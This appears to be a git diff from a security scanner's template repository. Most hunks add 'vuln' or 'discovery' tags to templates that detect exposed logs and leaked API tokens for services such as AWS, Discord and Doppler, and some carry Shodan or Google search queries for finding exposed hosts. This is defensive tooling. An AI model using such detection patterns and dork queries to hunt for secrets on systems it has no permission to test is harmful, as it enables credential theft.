https://www.exploit-db.com/ghdb/4278 metadata: max-request: 1 - tags: struts,debug,edb,exposure,apache + tags: struts,debug,edb,exposure,apache,vuln http: - method: GET diff --git a/http/exposures/logs/teampass-ldap.yaml b/http/exposures/logs/teampass-ldap.yaml index fc4d76c6370..a68c7a06e24 100644 --- a/http/exposures/logs/teampass-ldap.yaml +++ b/http/exposures/logs/teampass-ldap.yaml @@ -19,7 +19,7 @@ info: fofa-query: app="TEAMPASS" product: teampass vendor: teampass - tags: exposure,teampass,ldap,logs + tags: exposure,teampass,ldap,logs,vuln http: - method: GET diff --git a/http/exposures/logs/trace-axd-detect.yaml b/http/exposures/logs/trace-axd-detect.yaml index f763af67617..8bab05e7881 100644 --- a/http/exposures/logs/trace-axd-detect.yaml +++ b/http/exposures/logs/trace-axd-detect.yaml @@ -9,7 +9,7 @@ info: - https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/ metadata: max-request: 1 - tags: logs,asp,exposure + tags: logs,asp,exposure,discovery http: - method: GET diff --git a/http/exposures/logs/twig-runtime-error.yaml b/http/exposures/logs/twig-runtime-error.yaml index 1f109c30d5f..b4acc0c8c5a 100644 --- a/http/exposures/logs/twig-runtime-error.yaml +++ b/http/exposures/logs/twig-runtime-error.yaml @@ -8,7 +8,7 @@ info: max-request: 1 vendor: twig shodan-query: html:"Twig Runtime Error" - tags: error,twig,log + tags: error,twig,log,vuln http: - method: GET diff --git a/http/exposures/logs/vugex-source-detect.yaml b/http/exposures/logs/vugex-source-detect.yaml index ffef1c77932..5b4b2ab0242 100644 --- a/http/exposures/logs/vugex-source-detect.yaml +++ b/http/exposures/logs/vugex-source-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Vugex Framework" - tags: vugex,framework,disclosure,info-leak + tags: vugex,framework,disclosure,info-leak,discovery http: - raw: diff --git a/http/exposures/logs/webalizer-xtended-stats.yaml b/http/exposures/logs/webalizer-xtended-stats.yaml index c3a6722345b..fc95e1bb603 100644 --- a/http/exposures/logs/webalizer-xtended-stats.yaml +++ b/http/exposures/logs/webalizer-xtended-stats.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 google-query: inurl:"/usage/error_202109.html" - tags: exposure,stats,webalizer + tags: exposure,stats,webalizer,vuln http: - method: GET diff --git a/http/exposures/logs/wp-app-log.yaml b/http/exposures/logs/wp-app-log.yaml index 0d18a612edb..21edbc0148d 100644 --- a/http/exposures/logs/wp-app-log.yaml +++ b/http/exposures/logs/wp-app-log.yaml @@ -7,7 +7,7 @@ info: description: wp-app.log file is exposed. metadata: max-request: 1 - tags: exposure,logs + tags: exposure,logs,vuln http: - method: GET diff --git a/http/exposures/logs/ws-ftp-log.yaml b/http/exposures/logs/ws-ftp-log.yaml index 9720a130183..4c04aa4fbd3 100644 --- a/http/exposures/logs/ws-ftp-log.yaml +++ b/http/exposures/logs/ws-ftp-log.yaml @@ -13,7 +13,7 @@ info: vendor: ipswitch product: ws_ftp google-query: intitle:"Index of" ws_ftp.log - tags: exposure,ftp,logs + tags: exposure,ftp,logs,vuln http: - method: GET diff --git a/http/exposures/logs/yii-error-page.yaml b/http/exposures/logs/yii-error-page.yaml index 5f106f0bffc..795fc9e1551 100644 --- a/http/exposures/logs/yii-error-page.yaml +++ b/http/exposures/logs/yii-error-page.yaml @@ -13,7 +13,7 @@ info: vendor: yii_software product: yii shodan-query: html:"yii\base\ErrorException" - tags: exposure,yii,logs + tags: exposure,yii,logs,vuln http: - method: GET diff --git a/http/exposures/logs/zm-system-log-detect.yaml b/http/exposures/logs/zm-system-log-detect.yaml index 1a64e637544..e39133da1e1 100644 --- a/http/exposures/logs/zm-system-log-detect.yaml +++ b/http/exposures/logs/zm-system-log-detect.yaml @@ -8,7 +8,7 @@ info: reference: https://www.exploit-db.com/ghdb/6926 metadata: max-request: 2 - tags: logs,zm,exposure + tags: logs,zm,exposure,discovery http: - method: GET diff --git a/http/exposures/tokens/adafruit/adafruit-api-key.yaml b/http/exposures/tokens/adafruit/adafruit-api-key.yaml index 93353ee8205..ec3d6096348 100644 --- a/http/exposures/tokens/adafruit/adafruit-api-key.yaml +++ b/http/exposures/tokens/adafruit/adafruit-api-key.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: adafruit,exposure,tokens + tags: adafruit,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/adobe/adobe-client-id.yaml b/http/exposures/tokens/adobe/adobe-client-id.yaml index 78e3df74bb1..15fe21e5714 100644 --- a/http/exposures/tokens/adobe/adobe-client-id.yaml +++ b/http/exposures/tokens/adobe/adobe-client-id.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: adobe,exposure,tokens + tags: adobe,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/adobe/adobe-oauth-secret.yaml b/http/exposures/tokens/adobe/adobe-oauth-secret.yaml index b821fe2b988..2a172da40d2 100644 --- a/http/exposures/tokens/adobe/adobe-oauth-secret.yaml +++ b/http/exposures/tokens/adobe/adobe-oauth-secret.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: adobe,oauth,exposure,tokens + tags: adobe,oauth,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/age/age-public-key.yaml b/http/exposures/tokens/age/age-public-key.yaml index 336357b7a30..3be2135288e 100644 --- a/http/exposures/tokens/age/age-public-key.yaml +++ b/http/exposures/tokens/age/age-public-key.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: age-encryption,exposure,tokens + tags: age-encryption,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/age/age-secret-key.yaml b/http/exposures/tokens/age/age-secret-key.yaml index 9b4c2760436..94f528f73f9 100644 --- a/http/exposures/tokens/age/age-secret-key.yaml +++ b/http/exposures/tokens/age/age-secret-key.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: age-encryption,exposure,tokens + tags: age-encryption,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/airtable/airtable-api-key.yaml b/http/exposures/tokens/airtable/airtable-api-key.yaml index 9015d1fff17..fcb0f6bab35 100644 --- a/http/exposures/tokens/airtable/airtable-api-key.yaml +++ b/http/exposures/tokens/airtable/airtable-api-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: airtable,exposure,tokens + tags: airtable,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/algolia/algolia-api-key.yaml b/http/exposures/tokens/algolia/algolia-api-key.yaml index eba6f31d981..bc90e439efc 100644 --- a/http/exposures/tokens/algolia/algolia-api-key.yaml +++ b/http/exposures/tokens/algolia/algolia-api-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: algolia,exposure,tokens + tags: algolia,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml b/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml index 8634975b6bd..c5647f05421 100644 --- a/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml +++ b/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: alibaba,exposure,tokens + tags: alibaba,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml b/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml index 7c2edb08808..871cd467b93 100644 --- a/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml +++ b/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: alibaba,exposure,tokens + tags: alibaba,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/amazon/amazon-mws-auth-token.yaml b/http/exposures/tokens/amazon/amazon-mws-auth-token.yaml index 407e85da3d1..f6f508f6e82 100644 --- a/http/exposures/tokens/amazon/amazon-mws-auth-token.yaml +++ b/http/exposures/tokens/amazon/amazon-mws-auth-token.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,aws,amazon,auth + tags: exposure,token,aws,amazon,auth,vuln http: - method: GET diff --git a/http/exposures/tokens/amazon/amazon-sns-topic.yaml b/http/exposures/tokens/amazon/amazon-sns-topic.yaml index f28d31084ac..89202ec85d0 100755 --- a/http/exposures/tokens/amazon/amazon-sns-topic.yaml +++ b/http/exposures/tokens/amazon/amazon-sns-topic.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,amazon + tags: exposure,token,amazon,vuln http: - method: GET diff --git a/http/exposures/tokens/amazon/aws-access-key-value.yaml b/http/exposures/tokens/amazon/aws-access-key-value.yaml index d265b1642dc..83e9612cc48 100644 --- a/http/exposures/tokens/amazon/aws-access-key-value.yaml +++ b/http/exposures/tokens/amazon/aws-access-key-value.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,aws,amazon + tags: exposure,token,aws,amazon,vuln http: - method: GET diff --git a/http/exposures/tokens/amazon/aws-account-id.yaml b/http/exposures/tokens/amazon/aws-account-id.yaml index d333b735fd2..72baabd7ef4 100644 --- a/http/exposures/tokens/amazon/aws-account-id.yaml +++ b/http/exposures/tokens/amazon/aws-account-id.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: aws,amazon,token,exposure + tags: aws,amazon,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/amazon/aws-api-key.yaml b/http/exposures/tokens/amazon/aws-api-key.yaml index fc6469ad380..0271193b95c 100644 --- a/http/exposures/tokens/amazon/aws-api-key.yaml +++ b/http/exposures/tokens/amazon/aws-api-key.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 1 - tags: aws,amazon,token,exposure + tags: aws,amazon,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/amazon/aws-secret-key.yaml b/http/exposures/tokens/amazon/aws-secret-key.yaml index 614d18edfc9..6c8a84c1e44 100644 --- a/http/exposures/tokens/amazon/aws-secret-key.yaml +++ b/http/exposures/tokens/amazon/aws-secret-key.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: aws,exposure,tokens + tags: aws,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/amazon/aws-session-token.yaml b/http/exposures/tokens/amazon/aws-session-token.yaml index ce56bcf57a9..78a33b674cb 100644 --- a/http/exposures/tokens/amazon/aws-session-token.yaml +++ b/http/exposures/tokens/amazon/aws-session-token.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: aws,amazon,token,exposure,session + tags: aws,amazon,token,exposure,session,vuln http: - method: GET diff --git a/http/exposures/tokens/artifactory/artifactory-api-password.yaml b/http/exposures/tokens/artifactory/artifactory-api-password.yaml index 93c29eff26f..43924765151 100755 --- a/http/exposures/tokens/artifactory/artifactory-api-password.yaml +++ b/http/exposures/tokens/artifactory/artifactory-api-password.yaml @@ -8,7 +8,7 @@ info: - https://jfrog.com/help/r/jfrog-rest-apis/introduction-to-the-artifactory-rest-apis metadata: max-request: 1 - tags: exposure,token,artifactory + tags: exposure,token,artifactory,vuln http: - method: GET diff --git a/http/exposures/tokens/artifactory/artifactory-api-token.yaml b/http/exposures/tokens/artifactory/artifactory-api-token.yaml index 564c6b1e09e..7fbb8ddd9f7 100755 --- a/http/exposures/tokens/artifactory/artifactory-api-token.yaml +++ b/http/exposures/tokens/artifactory/artifactory-api-token.yaml @@ -8,7 +8,7 @@ info: - https://jfrog.com/help/r/jfrog-rest-apis/introduction-to-the-artifactory-rest-apis metadata: max-request: 1 - tags: exposure,token,artifactory + tags: exposure,token,artifactory,vuln http: - method: GET diff --git a/http/exposures/tokens/asana/asana-client-id.yaml b/http/exposures/tokens/asana/asana-client-id.yaml index ecce6e958e0..6b6df09935f 100644 --- a/http/exposures/tokens/asana/asana-client-id.yaml +++ b/http/exposures/tokens/asana/asana-client-id.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: asana,exposure,tokens,secret + tags: asana,exposure,tokens,secret,vuln http: - method: GET diff --git a/http/exposures/tokens/asana/asana-client-secret.yaml b/http/exposures/tokens/asana/asana-client-secret.yaml index 811a6a84182..33472d5c6ec 100644 --- a/http/exposures/tokens/asana/asana-client-secret.yaml +++ b/http/exposures/tokens/asana/asana-client-secret.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: asana,exposure,tokens,secret + tags: asana,exposure,tokens,secret,vuln http: - method: GET diff --git a/http/exposures/tokens/atlassian/atlassian-token.yaml b/http/exposures/tokens/atlassian/atlassian-token.yaml index d89167d6802..a1b2976b187 100644 --- a/http/exposures/tokens/atlassian/atlassian-token.yaml +++ b/http/exposures/tokens/atlassian/atlassian-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: atlassian,exposure,tokens + tags: atlassian,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/azure/azure-apim-secretkey.yaml b/http/exposures/tokens/azure/azure-apim-secretkey.yaml index e63112d9599..9be6a919dcc 100644 --- a/http/exposures/tokens/azure/azure-apim-secretkey.yaml +++ b/http/exposures/tokens/azure/azure-apim-secretkey.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"Ocp-Apim-Subscription-Key" - tags: azure,apim,microsoft,exposure + tags: azure,apim,microsoft,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/azure/azure-connection.yaml b/http/exposures/tokens/azure/azure-connection.yaml index 8cabcf6db1a..7e81a79fb7a 100644 --- a/http/exposures/tokens/azure/azure-connection.yaml +++ b/http/exposures/tokens/azure/azure-connection.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: azure,exposure,token + tags: azure,exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/beamer/beamer-token.yaml b/http/exposures/tokens/beamer/beamer-token.yaml index 951da085a20..4b4b5c47f88 100644 --- a/http/exposures/tokens/beamer/beamer-token.yaml +++ b/http/exposures/tokens/beamer/beamer-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: beamer,exposure,tokens + tags: beamer,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/bitbucket/bitbucket-clientid.yaml b/http/exposures/tokens/bitbucket/bitbucket-clientid.yaml index 00d56b8a1f4..54d8dc4df35 100644 --- a/http/exposures/tokens/bitbucket/bitbucket-clientid.yaml +++ b/http/exposures/tokens/bitbucket/bitbucket-clientid.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: bitbucket,exposure,tokens,clientid + tags: bitbucket,exposure,tokens,clientid,vuln http: - method: GET diff --git a/http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml b/http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml index 27bb48c29e4..750ed4c9c04 100644 --- a/http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml +++ b/http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: bitbucket,exposure,tokens,secret + tags: bitbucket,exposure,tokens,secret,vuln http: - method: GET diff --git a/http/exposures/tokens/bitly/bitly-secret-key.yaml b/http/exposures/tokens/bitly/bitly-secret-key.yaml index 9f4d7095c95..b152b441009 100755 --- a/http/exposures/tokens/bitly/bitly-secret-key.yaml +++ b/http/exposures/tokens/bitly/bitly-secret-key.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,bitly + tags: exposure,token,bitly,vuln http: - method: GET diff --git a/http/exposures/tokens/bittrex/bittrex-accesskey.yaml b/http/exposures/tokens/bittrex/bittrex-accesskey.yaml index 7563dc49d93..7dbb75e7ae1 100644 --- a/http/exposures/tokens/bittrex/bittrex-accesskey.yaml +++ b/http/exposures/tokens/bittrex/bittrex-accesskey.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: bittrex,exposure,tokens,accesskey + tags: bittrex,exposure,tokens,accesskey,vuln http: - method: GET diff --git a/http/exposures/tokens/bittrex/bittrex-secretkey.yaml b/http/exposures/tokens/bittrex/bittrex-secretkey.yaml index 7d6893c7689..01550bfabbf 100644 --- a/http/exposures/tokens/bittrex/bittrex-secretkey.yaml +++ b/http/exposures/tokens/bittrex/bittrex-secretkey.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: bittrex,exposure,tokens,secretkey + tags: bittrex,exposure,tokens,secretkey,vuln http: - method: GET diff --git a/http/exposures/tokens/clojars/clojars-token.yaml b/http/exposures/tokens/clojars/clojars-token.yaml index 2ed5f73d924..58c68379954 100644 --- a/http/exposures/tokens/clojars/clojars-token.yaml +++ b/http/exposures/tokens/clojars/clojars-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: clojars,exposure,tokens + tags: clojars,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/cloudinary/cloudinary-credentials.yaml b/http/exposures/tokens/cloudinary/cloudinary-credentials.yaml index 38638bfe93b..740baa8d51c 100755 --- a/http/exposures/tokens/cloudinary/cloudinary-credentials.yaml +++ b/http/exposures/tokens/cloudinary/cloudinary-credentials.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,cloudinary + tags: exposure,token,cloudinary,vuln http: - method: GET diff --git a/http/exposures/tokens/codeclimate/codeclimate-token.yaml b/http/exposures/tokens/codeclimate/codeclimate-token.yaml index c5a28aea9fc..7503848baae 100644 --- a/http/exposures/tokens/codeclimate/codeclimate-token.yaml +++ b/http/exposures/tokens/codeclimate/codeclimate-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: codeclimate,token,exposure + tags: codeclimate,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/codecov/codecov-accesstoken.yaml b/http/exposures/tokens/codecov/codecov-accesstoken.yaml index d0761130948..ec1dd5e8ee7 100644 --- a/http/exposures/tokens/codecov/codecov-accesstoken.yaml +++ b/http/exposures/tokens/codecov/codecov-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: codecov,exposure,tokens + tags: codecov,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/coinbase/coinbase-accesstoken.yaml b/http/exposures/tokens/coinbase/coinbase-accesstoken.yaml index f414ac8d936..527e489acbc 100644 --- a/http/exposures/tokens/coinbase/coinbase-accesstoken.yaml +++ b/http/exposures/tokens/coinbase/coinbase-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: coinbase,exposure,tokens + tags: coinbase,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/confluent/confluent-accesstoken.yaml b/http/exposures/tokens/confluent/confluent-accesstoken.yaml index 006a3a16875..1252df714d7 100644 --- a/http/exposures/tokens/confluent/confluent-accesstoken.yaml +++ b/http/exposures/tokens/confluent/confluent-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: confluent,exposure,tokens + tags: confluent,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/confluent/confluent-secretkey.yaml b/http/exposures/tokens/confluent/confluent-secretkey.yaml index aaff5e60e08..40c1a913b35 100644 --- a/http/exposures/tokens/confluent/confluent-secretkey.yaml +++ b/http/exposures/tokens/confluent/confluent-secretkey.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: confluent,exposure,tokens + tags: confluent,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/contentful/contentful-token.yaml b/http/exposures/tokens/contentful/contentful-token.yaml index f0d3bdfd014..020947ac59b 100644 --- a/http/exposures/tokens/contentful/contentful-token.yaml +++ b/http/exposures/tokens/contentful/contentful-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: contentful,exposure,tokens + tags: contentful,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/crates/crates-api-key.yaml b/http/exposures/tokens/crates/crates-api-key.yaml index c54b4387005..defec7b0f79 100644 --- a/http/exposures/tokens/crates/crates-api-key.yaml +++ b/http/exposures/tokens/crates/crates-api-key.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: crates,token,exposure + tags: crates,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/databricks/databricks-token.yaml b/http/exposures/tokens/databricks/databricks-token.yaml index e241d0ba152..1f89f8d9966 100644 --- a/http/exposures/tokens/databricks/databricks-token.yaml +++ b/http/exposures/tokens/databricks/databricks-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: databricks,exposure,tokens + tags: databricks,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/datadog/datadog-accesstoken.yaml b/http/exposures/tokens/datadog/datadog-accesstoken.yaml index cfb4b5fd476..84930809cf9 100644 --- a/http/exposures/tokens/datadog/datadog-accesstoken.yaml +++ b/http/exposures/tokens/datadog/datadog-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: datadog,exposure,tokens + tags: datadog,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/dependency/dependency-track-api.yaml b/http/exposures/tokens/dependency/dependency-track-api.yaml index f75c838dfbf..636485efbba 100644 --- a/http/exposures/tokens/dependency/dependency-track-api.yaml +++ b/http/exposures/tokens/dependency/dependency-track-api.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: dependency,exposure,tokens + tags: dependency,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml b/http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml index 4d3f6005dc7..828ca0d3ab4 100644 --- a/http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml +++ b/http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-425 metadata: max-request: 1 - tags: axiom,digitalocean,key,exposure + tags: axiom,digitalocean,key,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml b/http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml index e5f061e42df..ca631426627 100644 --- a/http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml +++ b/http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: digitalocean,exposure,token + tags: digitalocean,exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/digitalocean/digitalocean-app-token.yaml b/http/exposures/tokens/digitalocean/digitalocean-app-token.yaml index e161159492e..b0497ceee71 100644 --- a/http/exposures/tokens/digitalocean/digitalocean-app-token.yaml +++ b/http/exposures/tokens/digitalocean/digitalocean-app-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: digitalocean,exposure,token + tags: digitalocean,exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/digitalocean/digitalocean-refresh.yaml b/http/exposures/tokens/digitalocean/digitalocean-refresh.yaml index bbc2485baad..e4410cde2fd 100644 --- a/http/exposures/tokens/digitalocean/digitalocean-refresh.yaml +++ b/http/exposures/tokens/digitalocean/digitalocean-refresh.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: digitalocean,exposure,token + tags: digitalocean,exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml b/http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml index 90d75d03718..634c650b8fd 100644 --- a/http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml +++ b/http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml @@ -10,7 +10,7 @@ info: - https://www.digitalocean.com/community/tools/tugboat metadata: max-request: 1 - tags: tugboat,config,exposure + tags: tugboat,config,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/discord/discord-clientid.yaml b/http/exposures/tokens/discord/discord-clientid.yaml index ecb72ef6aad..37eb70149fe 100644 --- a/http/exposures/tokens/discord/discord-clientid.yaml +++ b/http/exposures/tokens/discord/discord-clientid.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: discord,exposure,tokens,clientid + tags: discord,exposure,tokens,clientid,vuln http: - method: GET diff --git a/http/exposures/tokens/discord/discord-clientsecret.yaml b/http/exposures/tokens/discord/discord-clientsecret.yaml index 611513e5bd8..192f8030735 100644 --- a/http/exposures/tokens/discord/discord-clientsecret.yaml +++ b/http/exposures/tokens/discord/discord-clientsecret.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: discord,exposure,tokens,clientid + tags: discord,exposure,tokens,clientid,vuln http: - method: GET diff --git a/http/exposures/tokens/discord/discord-token.yaml b/http/exposures/tokens/discord/discord-token.yaml index d3a463a163f..77be5749623 100644 --- a/http/exposures/tokens/discord/discord-token.yaml +++ b/http/exposures/tokens/discord/discord-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: discord,exposure,tokens + tags: discord,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/discord/discord-webhook.yaml b/http/exposures/tokens/discord/discord-webhook.yaml index aa557f5e301..318b41065e0 100755 --- a/http/exposures/tokens/discord/discord-webhook.yaml +++ b/http/exposures/tokens/discord/discord-webhook.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,discord + tags: exposure,token,discord,vuln http: - method: GET diff --git a/http/exposures/tokens/docker/docker-hub-pat.yaml b/http/exposures/tokens/docker/docker-hub-pat.yaml index 78b59830677..ff625547635 100644 --- a/http/exposures/tokens/docker/docker-hub-pat.yaml +++ b/http/exposures/tokens/docker/docker-hub-pat.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: docker,exposure,tokens + tags: docker,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/doppler/doppler-audit-token.yaml b/http/exposures/tokens/doppler/doppler-audit-token.yaml index 43927175f80..5d873d16a2f 100644 --- a/http/exposures/tokens/doppler/doppler-audit-token.yaml +++ b/http/exposures/tokens/doppler/doppler-audit-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: doppler,exposure,tokens + tags: doppler,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/doppler/doppler-cli-token.yaml b/http/exposures/tokens/doppler/doppler-cli-token.yaml index 77d6fafce2a..4258e56584e 100644 --- a/http/exposures/tokens/doppler/doppler-cli-token.yaml +++ b/http/exposures/tokens/doppler/doppler-cli-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: doppler,exposure,tokens + tags: doppler,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/doppler/doppler-scim-token.yaml b/http/exposures/tokens/doppler/doppler-scim-token.yaml index d5b7cc370f4..f6b925d1079 100644 --- a/http/exposures/tokens/doppler/doppler-scim-token.yaml +++ b/http/exposures/tokens/doppler/doppler-scim-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: doppler,exposure,tokens + tags: doppler,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/doppler/doppler-service-account-token.yaml b/http/exposures/tokens/doppler/doppler-service-account-token.yaml index ca5cf1313b4..bcad90cda27 100644 --- a/http/exposures/tokens/doppler/doppler-service-account-token.yaml +++ b/http/exposures/tokens/doppler/doppler-service-account-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: doppler,exposure,tokens + tags: doppler,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/doppler/doppler-service-token.yaml b/http/exposures/tokens/doppler/doppler-service-token.yaml index 1249113f172..58e6386edf9 100644 --- a/http/exposures/tokens/doppler/doppler-service-token.yaml +++ b/http/exposures/tokens/doppler/doppler-service-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: doppler,exposure,tokens + tags: doppler,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/doppler/doppler-token.yaml b/http/exposures/tokens/doppler/doppler-token.yaml index 7cc782f471d..381bced81ef 100644 --- a/http/exposures/tokens/doppler/doppler-token.yaml +++ b/http/exposures/tokens/doppler/doppler-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: doppler,exposure,tokens + tags: doppler,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/droneci/droneci-accesstoken.yaml b/http/exposures/tokens/droneci/droneci-accesstoken.yaml index f37f37eea16..f1778365b00 100644 --- a/http/exposures/tokens/droneci/droneci-accesstoken.yaml +++ b/http/exposures/tokens/droneci/droneci-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: droneci,exposure,tokens + tags: droneci,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/dropbox/dropbox-access-token.yaml b/http/exposures/tokens/dropbox/dropbox-access-token.yaml index b3dfa320cdb..c02188072a2 100644 --- a/http/exposures/tokens/dropbox/dropbox-access-token.yaml +++ b/http/exposures/tokens/dropbox/dropbox-access-token.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: dropbox,exposure,tokens + tags: dropbox,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/dropbox/dropbox-long-token.yaml 